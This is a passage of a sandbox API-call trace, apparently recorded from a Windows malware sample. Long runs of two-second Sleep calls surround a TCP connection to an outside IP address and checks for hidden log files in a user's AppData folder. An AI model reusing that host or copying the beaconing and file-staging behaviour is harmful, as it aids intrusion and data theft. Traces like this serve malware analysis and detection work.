(dwMilliseconds=0x7d0) [0220.081] Sleep (dwMilliseconds=0x7d0) [0220.082] Sleep (dwMilliseconds=0x7d0) [0220.084] Sleep (dwMilliseconds=0x7d0) [0220.085] Sleep (dwMilliseconds=0x7d0) [0220.090] Sleep (dwMilliseconds=0x7d0) [0220.091] Sleep (dwMilliseconds=0x7d0) [0220.093] Sleep (dwMilliseconds=0x7d0) [0220.094] Sleep (dwMilliseconds=0x7d0) [0220.096] Sleep (dwMilliseconds=0x7d0) [0220.097] Sleep (dwMilliseconds=0x7d0) [0220.099] Sleep (dwMilliseconds=0x7d0) [0220.100] Sleep (dwMilliseconds=0x7d0) [0220.102] Sleep (dwMilliseconds=0x7d0) [0220.103] Sleep (dwMilliseconds=0x7d0) [0220.105] Sleep (dwMilliseconds=0x7d0) [0220.106] Sleep (dwMilliseconds=0x7d0) [0220.111] Sleep (dwMilliseconds=0x7d0) [0220.112] Sleep (dwMilliseconds=0x7d0) [0220.114] Sleep (dwMilliseconds=0x7d0) [0220.115] Sleep (dwMilliseconds=0x7d0) [0220.117] Sleep (dwMilliseconds=0x7d0) [0220.118] Sleep (dwMilliseconds=0x7d0) [0220.124] Sleep (dwMilliseconds=0x7d0) [0220.178] Sleep (dwMilliseconds=0x7d0) [0220.185] Sleep (dwMilliseconds=0x7d0) [0220.186] Sleep (dwMilliseconds=0x7d0) [0220.189] Sleep (dwMilliseconds=0x7d0) [0220.191] Sleep (dwMilliseconds=0x7d0) [0220.195] Sleep (dwMilliseconds=0x7d0) [0220.197] Sleep (dwMilliseconds=0x7d0) [0220.198] Sleep (dwMilliseconds=0x7d0) [0220.200] Sleep (dwMilliseconds=0x7d0) [0220.201] Sleep (dwMilliseconds=0x7d0) [0220.203] Sleep (dwMilliseconds=0x7d0) [0220.204] Sleep (dwMilliseconds=0x7d0) [0220.206] Sleep (dwMilliseconds=0x7d0) [0220.207] Sleep (dwMilliseconds=0x7d0) [0220.209] Sleep (dwMilliseconds=0x7d0) [0220.210] Sleep (dwMilliseconds=0x7d0) [0220.212] Sleep (dwMilliseconds=0x7d0) [0220.213] Sleep (dwMilliseconds=0x7d0) [0220.218] Sleep (dwMilliseconds=0x7d0) [0220.220] Sleep (dwMilliseconds=0x7d0) [0220.221] Sleep (dwMilliseconds=0x7d0) [0220.223] Sleep (dwMilliseconds=0x7d0) [0220.224] Sleep (dwMilliseconds=0x7d0) [0220.229] Sleep (dwMilliseconds=0x7d0) [0220.230] Sleep (dwMilliseconds=0x7d0) [0220.232] Sleep (dwMilliseconds=0x7d0) [0220.233] Sleep (dwMilliseconds=0x7d0) [0220.237] Sleep (dwMilliseconds=0x7d0) [0220.240] Sleep (dwMilliseconds=0x7d0) [0220.242] Sleep (dwMilliseconds=0x7d0) [0220.243] Sleep (dwMilliseconds=0x7d0) [0220.245] Sleep (dwMilliseconds=0x7d0) [0220.246] Sleep (dwMilliseconds=0x7d0) [0220.248] Sleep (dwMilliseconds=0x7d0) [0220.251] Sleep (dwMilliseconds=0x7d0) [0220.252] Sleep (dwMilliseconds=0x7d0) [0220.254] Sleep (dwMilliseconds=0x7d0) [0220.255] Sleep (dwMilliseconds=0x7d0) [0220.260] Sleep (dwMilliseconds=0x7d0) [0220.262] Sleep (dwMilliseconds=0x7d0) [0220.263] Sleep (dwMilliseconds=0x7d0) [0220.265] Sleep (dwMilliseconds=0x7d0) [0220.266] Sleep (dwMilliseconds=0x7d0) [0220.272] Sleep (dwMilliseconds=0x7d0) [0220.274] Sleep (dwMilliseconds=0x7d0) [0220.275] Sleep (dwMilliseconds=0x7d0) [0220.277] Sleep (dwMilliseconds=0x7d0) [0220.279] Sleep (dwMilliseconds=0x7d0) [0220.282] Sleep (dwMilliseconds=0x7d0) [0220.284] Sleep (dwMilliseconds=0x7d0) [0220.285] Sleep (dwMilliseconds=0x7d0) [0220.287] Sleep (dwMilliseconds=0x7d0) [0220.288] Sleep (dwMilliseconds=0x7d0) [0220.303] Sleep (dwMilliseconds=0x7d0) [0220.304] Sleep (dwMilliseconds=0x7d0) [0220.326] Sleep (dwMilliseconds=0x7d0) [0220.380] Sleep (dwMilliseconds=0x7d0) [0220.390] Sleep (dwMilliseconds=0x7d0) [0220.437] socket (af=2, type=1, protocol=6) returned 0x2038 [0220.438] connect (s=0x2038, name=0x9f943f0*(sa_family=2, sin_port=0x50, sin_addr="103.224.212.222"), namelen=16) returned 0 [0220.639] send (s=0x2038, buf=0x82e10fa*, len=173, flags=0) returned 173 [0220.641] setsockopt (s=0x2038, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0220.641] recv (in: s=0x2038, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 407 [0220.869] closesocket (s=0x2038) returned 0 [0220.874] Sleep (dwMilliseconds=0x7d0) [0220.885] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0220.885] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0220.887] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0220.887] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89800) returned 1 [0220.887] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0220.887] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0220.887] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0220.887] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a970) returned 1 [0220.887] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0220.887] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0220.887] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0220.887] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89800) returned 1 [0220.888] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0220.888] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0220.888] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0220.888] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a970) returned 1 [0220.888] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0220.888] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0220.888] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0220.888] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8aa00) returned 1 [0220.888] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0220.888] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0220.889] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0220.889] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89800) returned 1 [0220.889] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0220.889] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0220.889] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0220.889] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f899b0) returned 1 [0220.889] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0220.889] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0220.889] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0220.889] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89c80) returned 1 [0220.889] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0220.890] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0220.890] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0220.890] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89800) returned 1 [0220.890] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0220.890] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0220.890] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0220.890] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a2b0) returned 1 [0220.891] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0220.891] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0220.891] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0220.891] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89ad0) returned 1 [0220.891] Sleep (dwMilliseconds=0x7d0) [0220.893] Sleep (dwMilliseconds=0x7d0) [0220.895] Sleep (dwMilliseconds=0x7d0) [0220.897] Sleep (dwMilliseconds=0x7d0) [0220.899] Sleep (dwMilliseconds=0x7d0) [0220.901] Sleep (dwMilliseconds=0x7d0) [0220.902] Sleep (dwMilliseconds=0x7d0) [0220.907] Sleep (dwMilliseconds=0x7d0) [0220.910] Sleep (dwMilliseconds=0x7d0) [0220.912] Sleep (dwMilliseconds=0x7d0) [0220.914] Sleep (dwMilliseconds=0x7d0) [0220.915] Sleep (dwMilliseconds=0x7d0) [0220.917] Sleep (dwMilliseconds=0x7d0) [0220.918] Sleep (dwMilliseconds=0x7d0) [0220.920] Sleep (dwMilliseconds=0x7d0) [0220.921] Sleep (dwMilliseconds=0x7d0) [0220.923] Sleep (dwMilliseconds=0x7d0) [0220.924] Sleep (dwMilliseconds=0x7d0) [0220.926] Sleep (dwMilliseconds=0x7d0) [0220.927] Sleep (dwMilliseconds=0x7d0) [0220.929] Sleep (dwMilliseconds=0x7d0) [0220.931] Sleep (dwMilliseconds=0x7d0) [0220.934] Sleep (dwMilliseconds=0x7d0) [0220.935] Sleep (dwMilliseconds=0x7d0) [0220.937] Sleep (dwMilliseconds=0x7d0) [0220.939] Sleep (dwMilliseconds=0x7d0) [0220.940] Sleep (dwMilliseconds=0x7d0) [0220.943] Sleep (dwMilliseconds=0x7d0) [0220.944] Sleep (dwMilliseconds=0x7d0) [0220.946] Sleep (dwMilliseconds=0x7d0) [0220.947] Sleep (dwMilliseconds=0x7d0) [0220.949] Sleep (dwMilliseconds=0x7d0) [0220.951] Sleep (dwMilliseconds=0x7d0) [0220.953] Sleep (dwMilliseconds=0x7d0) [0220.955] Sleep (dwMilliseconds=0x7d0) [0220.957] Sleep (dwMilliseconds=0x7d0) [0220.958] Sleep (dwMilliseconds=0x7d0) [0220.960] Sleep (dwMilliseconds=0x7d0) [0220.962] Sleep (dwMilliseconds=0x7d0) [0220.964] Sleep (dwMilliseconds=0x7d0) [0220.965] Sleep (dwMilliseconds=0x7d0) [0220.967] Sleep (dwMilliseconds=0x7d0) [0220.968] Sleep (dwMilliseconds=0x7d0) [0220.970] Sleep (dwMilliseconds=0x7d0) [0220.971] Sleep (dwMilliseconds=0x7d0) [0220.973] Sleep (dwMilliseconds=0x7d0) [0220.976] Sleep (dwMilliseconds=0x7d0) [0220.977] Sleep (dwMilliseconds=0x7d0) [0220.979] Sleep (dwMilliseconds=0x7d0) [0220.980] Sleep (dwMilliseconds=0x7d0) [0220.982] Sleep (dwMilliseconds=0x7d0) [0220.984] Sleep (dwMilliseconds=0x7d0) [0220.986] Sleep (dwMilliseconds=0x7d0) [0220.988] Sleep (dwMilliseconds=0x7d0) [0220.990] Sleep (dwMilliseconds=0x7d0) [0220.991] Sleep (dwMilliseconds=0x7d0) [0220.993] Sleep (dwMilliseconds=0x7d0) [0220.994] Sleep (dwMilliseconds=0x7d0) [0220.996] Sleep (dwMilliseconds=0x7d0) [0220.999] Sleep (dwMilliseconds=0x7d0) [0221.000] Sleep (dwMilliseconds=0x7d0) [0221.002] Sleep (dwMilliseconds=0x7d0) [0221.003] Sleep (dwMilliseconds=0x7d0) [0221.005] Sleep (dwMilliseconds=0x7d0) [0221.007] Sleep (dwMilliseconds=0x7d0) [0221.008] Sleep (dwMilliseconds=0x7d0) [0221.010] Sleep (dwMilliseconds=0x7d0) [0221.011] Sleep (dwMilliseconds=0x7d0) [0221.013] Sleep (dwMilliseconds=0x7d0) [0221.014] Sleep (dwMilliseconds=0x7d0) [0221.054] Sleep (dwMilliseconds=0x7d0) [0221.056] Sleep (dwMilliseconds=0x7d0) [0221.058] Sleep (dwMilliseconds=0x7d0) [0221.060] Sleep (dwMilliseconds=0x7d0) [0221.062] Sleep (dwMilliseconds=0x7d0) [0221.065] Sleep (dwMilliseconds=0x7d0) [0221.066] Sleep (dwMilliseconds=0x7d0) [0221.068] Sleep (dwMilliseconds=0x7d0) [0221.069] Sleep (dwMilliseconds=0x7d0) [0221.073] Sleep (dwMilliseconds=0x7d0) [0221.075] Sleep (dwMilliseconds=0x7d0) [0221.076] Sleep (dwMilliseconds=0x7d0) [0221.078] Sleep (dwMilliseconds=0x7d0) [0221.079] Sleep (dwMilliseconds=0x7d0) [0221.081] Sleep (dwMilliseconds=0x7d0) [0221.083] Sleep (dwMilliseconds=0x7d0) [0221.084] Sleep (dwMilliseconds=0x7d0) [0221.086] Sleep (dwMilliseconds=0x7d0) [0221.087] Sleep (dwMilliseconds=0x7d0) [0221.088] Sleep (dwMilliseconds=0x7d0) [0221.090] Sleep (dwMilliseconds=0x7d0) [0221.091] Sleep (dwMilliseconds=0x7d0) [0221.093] Sleep (dwMilliseconds=0x7d0) [0221.100] Sleep (dwMilliseconds=0x7d0) [0221.105] Sleep (dwMilliseconds=0x7d0) [0221.110] Sleep (dwMilliseconds=0x7d0) [0221.111] Sleep (dwMilliseconds=0x7d0) [0221.129] Sleep (dwMilliseconds=0x7d0) [0221.131] Sleep (dwMilliseconds=0x7d0) [0221.132] Sleep (dwMilliseconds=0x7d0) [0221.134] Sleep (dwMilliseconds=0x7d0) [0221.135] Sleep (dwMilliseconds=0x7d0) [0221.140] Sleep (dwMilliseconds=0x7d0) [0221.141] Sleep (dwMilliseconds=0x7d0) [0221.143] Sleep (dwMilliseconds=0x7d0) [0221.145] Sleep (dwMilliseconds=0x7d0) [0221.146] Sleep (dwMilliseconds=0x7d0) [0221.151] Sleep (dwMilliseconds=0x7d0) [0221.152] Sleep (dwMilliseconds=0x7d0) [0221.154] Sleep (dwMilliseconds=0x7d0) [0221.155] Sleep (dwMilliseconds=0x7d0) [0221.157] Sleep (dwMilliseconds=0x7d0) [0221.158] Sleep (dwMilliseconds=0x7d0) [0221.160] Sleep (dwMilliseconds=0x7d0) [0221.161] Sleep (dwMilliseconds=0x7d0) [0221.163] Sleep (dwMilliseconds=0x7d0) [0221.164] Sleep (dwMilliseconds=0x7d0) [0221.166] Sleep (dwMilliseconds=0x7d0) [0221.168] Sleep (dwMilliseconds=0x7d0) [0221.176] Sleep (dwMilliseconds=0x7d0) [0221.178] Sleep (dwMilliseconds=0x7d0) [0221.179] Sleep (dwMilliseconds=0x7d0) [0221.181] Sleep (dwMilliseconds=0x7d0) [0221.186] Sleep (dwMilliseconds=0x7d0) [0221.187] Sleep (dwMilliseconds=0x7d0) [0221.189] Sleep (dwMilliseconds=0x7d0) [0221.190] Sleep (dwMilliseconds=0x7d0) [0221.196] Sleep (dwMilliseconds=0x7d0) [0221.198] Sleep (dwMilliseconds=0x7d0) [0221.199] Sleep (dwMilliseconds=0x7d0) [0221.201] Sleep (dwMilliseconds=0x7d0) [0221.203] Sleep (dwMilliseconds=0x7d0) [0221.205] Sleep (dwMilliseconds=0x7d0) [0221.206] Sleep (dwMilliseconds=0x7d0) [0221.208] Sleep (dwMilliseconds=0x7d0) [0221.209] Sleep (dwMilliseconds=0x7d0) [0221.211] Sleep (dwMilliseconds=0x7d0) [0221.212] Sleep (dwMilliseconds=0x7d0) [0221.217] Sleep (dwMilliseconds=0x7d0) [0221.218] Sleep (dwMilliseconds=0x7d0) [0221.220] Sleep (dwMilliseconds=0x7d0) [0221.221] Sleep (dwMilliseconds=0x7d0) [0221.223] Sleep (dwMilliseconds=0x7d0) [0221.224] Sleep (dwMilliseconds=0x7d0) [0221.228] Sleep (dwMilliseconds=0x7d0) [0221.230] Sleep (dwMilliseconds=0x7d0) [0221.231] Sleep (dwMilliseconds=0x7d0) [0221.233] Sleep (dwMilliseconds=0x7d0) [0221.234] Sleep (dwMilliseconds=0x7d0) [0221.236] Sleep (dwMilliseconds=0x7d0) [0221.239] Sleep (dwMilliseconds=0x7d0) [0221.240] Sleep (dwMilliseconds=0x7d0) [0221.242] Sleep (dwMilliseconds=0x7d0) [0221.243] Sleep (dwMilliseconds=0x7d0) [0221.245] Sleep (dwMilliseconds=0x7d0) [0221.246] Sleep (dwMilliseconds=0x7d0) [0221.248] Sleep (dwMilliseconds=0x7d0) [0221.249] Sleep (dwMilliseconds=0x7d0) [0221.251] Sleep (dwMilliseconds=0x7d0) [0221.252] Sleep (dwMilliseconds=0x7d0) [0221.254] Sleep (dwMilliseconds=0x7d0) [0221.255] Sleep (dwMilliseconds=0x7d0) 